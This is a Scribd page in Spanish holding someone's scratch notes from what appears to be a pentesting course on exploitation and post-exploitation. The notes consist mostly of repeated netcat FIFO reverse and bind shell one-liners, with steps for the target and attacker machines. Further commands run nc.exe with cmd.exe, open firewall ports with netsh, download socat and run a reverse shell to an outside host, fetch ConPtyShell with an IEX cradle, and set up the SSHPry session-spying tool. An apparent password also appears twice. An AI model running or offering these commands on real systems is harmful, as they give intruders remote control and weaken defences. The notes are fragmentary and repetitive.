0% encontró este documento útil (0 votos)

64 vistas5 páginas

Explotación de ACDSee FotoSlate 6996

El documento contiene instrucciones para establecer una conexión de shell remota mediante netcat (nc) entre una máquina atacante y una máquina objetivo, incluyendo los comandos para crear un archivo FIFO, ejecutar un shell interactivo y transmitirlo a través de nc, y borrar el archivo una vez finalizada la conexión. También incluye otras instrucciones para instalar herramientas de hacking como SSHPry y ConPtyShell para obtener shells remotas.

Cargado por

Manuel Alberto Sanchez

Derechos de autor

Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.

Formatos disponibles

Descarga como TXT, PDF, TXT o lee en línea desde Scribd

0% encontró este documento útil (0 votos)

64 vistas5 páginas

Explotación de ACDSee FotoSlate 6996

Cargado por

Manuel Alberto Sanchez

Derechos de autor

Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.

Formatos disponibles

Descarga como TXT, PDF, TXT o lee en línea desde Scribd

75 exploit/windows/fileformat/acdsee_fotoslate_string 2011-09-12

good No ACDSee FotoSlate PLP File id Parameter Overflow

rm –f /tmp/f; mkfifo /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f;

nc –nv [Link] 6996

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996 >/tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc –l [ip objetivo] 6996 > /tmp/f

sudo cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 6996> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 6996 > /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 21> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

K4l1$1973

nc –nv [Link] 21

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 8787> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 4444> /tmp/f

cat /tmp/f | /bin/sh -i 2>&1 | nc [Link] 514> /tmp/f

nc –lvpn [Link] 6996

XXXXXXXXXXXXXXXXXXXXX

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

nc -nv [Link] 521

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 514> /tmp/f

XXXXXXXXXXXXXXXXXXXXXXXXXXX

apt-get install nc
•
rm –f /tmp/f; mkfifo /tmp/f
• se ejecuta un /bin/sh en el lado de la máquina objetivo y se transmite una shell
al atacante:
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f

• Para realizar la conexión con la máquina objetivo se debe ejecutar desde una
terminal de la máquina atacante el siguiente comando:
nc –nv [Link] 6996

• Finalmente no se debe olvidar borrar el archivo creado inicialmente en la máquina

objetivo:
rm –f /tmp/f

cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 6996 >/tmp/f

C:\Windows\System32\[Link] –Ldp 31338 –vv –e [Link]

xxxxxxxxxxxxxxxxxxxx

vmware:

[Link]

xxxxxxxxxxxxxxxxxx

LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6

xxxxxxxxxxxxxxxxxxx

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

nc -nv [Link] 521

cat /tmp/f | /bin/sh -i 2>&1 | nc -l [Link] 6996> /tmp/f

XXXXXXXXXXXXXXXXXXXXXXXXXXX
apt-get install nc
•
rm –f /tmp/f; mkfifo /tmp/f
• se ejecuta un /bin/sh en el lado de la máquina objetivo y se transmite una shell
al atacante:
cat /tmp/f | /bin/sh -i 2>&1 | nc –l [Link] 6996> /tmp/f

• Para realizar la conexión con la máquina objetivo se debe ejecutar desde una
terminal de la máquina atacante el siguiente comando:
nc –nv [Link] 6996

• Finalmente no se debe olvidar borrar el archivo creado inicialmente en la máquina

objetivo:
rm –f /tmp/f

C:\Windows\System32\[Link] –Ldp 31338 –vv –e [Link]

netsh firewall show opmode

netsh firewall add portopening TCP 31338 ”Prueba Netcat” ENABLE ALL
netsh advfirewall firewall add rule name=“Servicio Netcat” protocol=tcp
LocalPort=31338 dir=in enable=yes action=allow profile=Private

K4l1$1973

XXXXXXXXXXXXXXXXXXXXXX

git clone [Link]

rm –SSHPry2.0 /root/SSHPry2.0

[Link]

python [Link] --list

cd SSHPry2.0/

sudo /etc/init.d/ssh start

tail -f [Link]

chmod +x [Link]

git clone [Link]

xxxxxxxxxxxxxxxxxx

uname -v
SHA256sum
649d35f610205828a08c86d862dc6e660dced6553e55f62acf59d57643c5031f

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

exit

passwd

sudo passwd root

sudo adduser gesmass

pwd
/home/kali

ls
gesmass kali

cd home/kali

sudo usermod -aG sudo gesmass

sudo apt-get install terminator

terminator

sudo apt-get install git

sudo apt-get install python3-pip

sudo pip install

ls
code_1.67.1-1651841865_amd64.deb

sudo apt install geany

geany

sudo apt install -y htop

htop

sudo apt install neofetch

neofetch

┌──(kali㉿kali)-[~/Downloads]
└─$ ls
code_1.67.1-1651841865_amd64.deb nordvpn-release_1.0.0_all.deb
sudo apt-get install ./nordvpn-release_1.0.0_all.deb

sudo apt-get update

sudo apt-get install nordvpn -y

sudo nordvpn settings

kali-tweaks

XXXXXXXXXXXXXXXXXXXXX

nc -lnvp 6996

stty raw -echo; (stty size; cat) | nc -lvnp 87

ConPtyShell [direccion de ip] [puerto]

user@victim$ wget -q
[Link]
-O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -
li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242

IEX(IWR [Link]
ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [Link] 87

cherrytree
sudo apt install ./code_1.67.1-1651841865_amd64.deb

M3A5. Explotación y Post-explotación de Vulnerabilidades

[Link]
utm_content=DAFA6Q5eLkY&utm_campaign=designshare&utm_medium=link2&utm_source=shareb
utton

También podría gustarte

Practica8 V1
Aún no hay calificaciones
Practica8 V1
29 páginas
Análisis y explotación de vulnerabilidades en red
Aún no hay calificaciones
Análisis y explotación de vulnerabilidades en red
21 páginas
Acceso a Puertos y Explotación de Vulnerabilidades
Aún no hay calificaciones
Acceso a Puertos y Explotación de Vulnerabilidades
24 páginas
Hackeo de Windows 8 con Kali Linux
Aún no hay calificaciones
Hackeo de Windows 8 con Kali Linux
4 páginas
Guía de Pentesting: Captura de Bandera
Aún no hay calificaciones
Guía de Pentesting: Captura de Bandera
10 páginas
Explotación de Vulnerabilidades en Puertos
Aún no hay calificaciones
Explotación de Vulnerabilidades en Puertos
36 páginas
Guía de Explotabilidad de Metasploitable 2
Aún no hay calificaciones
Guía de Explotabilidad de Metasploitable 2
8 páginas
Análisis de Vulnerabilidades en Metasploitable 2
Aún no hay calificaciones
Análisis de Vulnerabilidades en Metasploitable 2
20 páginas
Explotación de CTF Djinn: 2 en Linux
Aún no hay calificaciones
Explotación de CTF Djinn: 2 en Linux
22 páginas
Seguridad Informática Ataques Desde Kali Linux A Windows
Aún no hay calificaciones
Seguridad Informática Ataques Desde Kali Linux A Windows
6 páginas
Ataques básicos con Kali Linux: Guía práctica
Aún no hay calificaciones
Ataques básicos con Kali Linux: Guía práctica
6 páginas
Angel Mendoza
Aún no hay calificaciones
Angel Mendoza
13 páginas
Kalilinux
Aún no hay calificaciones
Kalilinux
5 páginas
Laboratorio Final
Aún no hay calificaciones
Laboratorio Final
17 páginas
Guía de Explotación en DockerLabs
Aún no hay calificaciones
Guía de Explotación en DockerLabs
8 páginas
08 CTF (Capture The Flag)
Aún no hay calificaciones
08 CTF (Capture The Flag)
658 páginas
Comandos BASH para Seguridad Informática
Aún no hay calificaciones
Comandos BASH para Seguridad Informática
8 páginas
Laboratorio 01 Kali Linux Metasploitable
Aún no hay calificaciones
Laboratorio 01 Kali Linux Metasploitable
42 páginas
Laboratorio 6 - Metasploitable
Aún no hay calificaciones
Laboratorio 6 - Metasploitable
26 páginas
Guía de Pentesting para Escape Room
Aún no hay calificaciones
Guía de Pentesting para Escape Room
25 páginas
Aicc102 s3 Grupo 22
Aún no hay calificaciones
Aicc102 s3 Grupo 22
11 páginas
Annie Informe - Sebastian Reyes
Aún no hay calificaciones
Annie Informe - Sebastian Reyes
8 páginas
Aranda Fernandez Maricarmen SAD Tarea02
Aún no hay calificaciones
Aranda Fernandez Maricarmen SAD Tarea02
81 páginas
Pentesting con Metasploit y EternalBlue
Aún no hay calificaciones
Pentesting con Metasploit y EternalBlue
5 páginas
Backdoor y Post-Explotación en Windows 7
Aún no hay calificaciones
Backdoor y Post-Explotación en Windows 7
20 páginas
Guía de Explotación Metasploitable 2
Aún no hay calificaciones
Guía de Explotación Metasploitable 2
6 páginas
мануал ru es
Aún no hay calificaciones
мануал ru es
63 páginas
Guía de Explotación de Sticky Fingers
Aún no hay calificaciones
Guía de Explotación de Sticky Fingers
40 páginas
Tutorial de Pentesting con Metasploit
Aún no hay calificaciones
Tutorial de Pentesting con Metasploit
11 páginas
Curso Kali 1er Parte
0% (1)
Curso Kali 1er Parte
63 páginas
Exploración del Puerto 8180 en Metasploitable
Aún no hay calificaciones
Exploración del Puerto 8180 en Metasploitable
41 páginas
Explotacion de Vulnerabiliades en Metaesploitable 2
Aún no hay calificaciones
Explotacion de Vulnerabiliades en Metaesploitable 2
23 páginas
Vulnerabilidades ProFTPD y EternalBlue
Aún no hay calificaciones
Vulnerabilidades ProFTPD y EternalBlue
14 páginas
Explotación de vulnerabilidades en SMB y Firefox
Aún no hay calificaciones
Explotación de vulnerabilidades en SMB y Firefox
14 páginas
Ataques Con Kali Linux
Aún no hay calificaciones
Ataques Con Kali Linux
4 páginas
Explotación de Log4Shell en Area51 CTF
Aún no hay calificaciones
Explotación de Log4Shell en Area51 CTF
10 páginas
CarrierHTB WriteUp ETHCOP
Aún no hay calificaciones
CarrierHTB WriteUp ETHCOP
13 páginas
Comandos y Herramientas en Kali Linux
Aún no hay calificaciones
Comandos y Herramientas en Kali Linux
3 páginas
Pentesting: Exploit EternalBlue en Win7
Aún no hay calificaciones
Pentesting: Exploit EternalBlue en Win7
5 páginas
Ethical Hacking
Aún no hay calificaciones
Ethical Hacking
224 páginas
Teoria-MOVIMIENTOS LATERALES EN WINDOWS
Aún no hay calificaciones
Teoria-MOVIMIENTOS LATERALES EN WINDOWS
23 páginas
Death Star
Aún no hay calificaciones
Death Star
19 páginas
Informe de R00tless
Aún no hay calificaciones
Informe de R00tless
18 páginas
CTF Djinn 1
Aún no hay calificaciones
CTF Djinn 1
14 páginas
Escaneo y Ataque a Linux con Nmap
Aún no hay calificaciones
Escaneo y Ataque a Linux con Nmap
18 páginas
Ejercicio Práctico en Kali Linux
Aún no hay calificaciones
Ejercicio Práctico en Kali Linux
7 páginas
Explotación de Vulnerabilidades en Metasploitable 2
Aún no hay calificaciones
Explotación de Vulnerabilidades en Metasploitable 2
43 páginas
Parrot
Aún no hay calificaciones
Parrot
11 páginas
Kali Linux
Aún no hay calificaciones
Kali Linux
16 páginas
Vulnerabilidades en Metasploitable 2
Aún no hay calificaciones
Vulnerabilidades en Metasploitable 2
8 páginas
Buenas Practicas Seguridad Iaas-W
Aún no hay calificaciones
Buenas Practicas Seguridad Iaas-W
23 páginas
Proyecto S.
Aún no hay calificaciones
Proyecto S.
7 páginas
Exploit Kali Linux en Windows 8.1
Aún no hay calificaciones
Exploit Kali Linux en Windows 8.1
10 páginas
Configuración de Red y Explotación en IoT
Aún no hay calificaciones
Configuración de Red y Explotación en IoT
12 páginas
Auditoría de Seguridad en Redes
Aún no hay calificaciones
Auditoría de Seguridad en Redes
26 páginas
Basic Pentesting
Aún no hay calificaciones
Basic Pentesting
10 páginas
Samba Ldap Debian
Aún no hay calificaciones
Samba Ldap Debian
31 páginas
Actualización Teldat V por FTP
Aún no hay calificaciones
Actualización Teldat V por FTP
4 páginas
Fundamentos de Enrutamiento en Redes
Aún no hay calificaciones
Fundamentos de Enrutamiento en Redes
23 páginas
Claves Nod32 5 2015
Aún no hay calificaciones
Claves Nod32 5 2015
5 páginas
Entrega de Credenciales EsSalud
Aún no hay calificaciones
Entrega de Credenciales EsSalud
89 páginas
Codigos Iptv Smarters Pro
Aún no hay calificaciones
Codigos Iptv Smarters Pro
10 páginas
Comandos Switch y Router Cisco
100% (3)
Comandos Switch y Router Cisco
10 páginas
Nuevas Licencias para Su Eset Nod V6 Al V9
Aún no hay calificaciones
Nuevas Licencias para Su Eset Nod V6 Al V9
10 páginas
Examen de Certificación Práctica CCENT #1y2
Aún no hay calificaciones
Examen de Certificación Práctica CCENT #1y2
85 páginas
Javascript
Aún no hay calificaciones
Javascript
6 páginas
Protocolos de Enrutamiento de Estado de Enlace
Aún no hay calificaciones
Protocolos de Enrutamiento de Estado de Enlace
42 páginas
Resumen de Rutas
Aún no hay calificaciones
Resumen de Rutas
11 páginas
Configuración Básica para Routers y Switches Huawei
Aún no hay calificaciones
Configuración Básica para Routers y Switches Huawei
12 páginas
LDAP Diapositivas
Aún no hay calificaciones
LDAP Diapositivas
37 páginas
Comparativa entre RIP 1.0 y RIP 2.0
Aún no hay calificaciones
Comparativa entre RIP 1.0 y RIP 2.0
6 páginas
Configuración de Epson Print Admin
Aún no hay calificaciones
Configuración de Epson Print Admin
141 páginas
Contraseñas por defecto de impresoras Aficio
Aún no hay calificaciones
Contraseñas por defecto de impresoras Aficio
3 páginas
9.1.1.8 Lab - Examining Telnet and SSH in Wireshark
Aún no hay calificaciones
9.1.1.8 Lab - Examining Telnet and SSH in Wireshark
6 páginas
Guía de instalación y configuración SAMBA en Debian
Aún no hay calificaciones
Guía de instalación y configuración SAMBA en Debian
6 páginas
Guía de Configuración y Seguridad SSH
Aún no hay calificaciones
Guía de Configuración y Seguridad SSH
11 páginas
2023-11-24 BiPay
Aún no hay calificaciones
2023-11-24 BiPay
34 páginas
Mejores Prácticas de Seguridad en SQL Server
Aún no hay calificaciones
Mejores Prácticas de Seguridad en SQL Server
2 páginas
Configuración de Red y Seguridad en Routers
Aún no hay calificaciones
Configuración de Red y Seguridad en Routers
1 página
Configuración AAA y RADIUS en Switches
Aún no hay calificaciones
Configuración AAA y RADIUS en Switches
4 páginas
Lab 7 - Configurar Rutas Estáticas
Aún no hay calificaciones
Lab 7 - Configurar Rutas Estáticas
10 páginas
Olga Ospina: Beneficiarios UDS
Aún no hay calificaciones
Olga Ospina: Beneficiarios UDS
376 páginas
Nod32 V
Aún no hay calificaciones
Nod32 V
3 páginas
Configuración del Servidor Proxy Squid
Aún no hay calificaciones
Configuración del Servidor Proxy Squid
7 páginas
¿Cómo Crear Un Proceso para Registro de Usuarios - Bonitasoft Community
Aún no hay calificaciones
¿Cómo Crear Un Proceso para Registro de Usuarios - Bonitasoft Community
6 páginas
Protocolo OSPF
Aún no hay calificaciones
Protocolo OSPF
27 páginas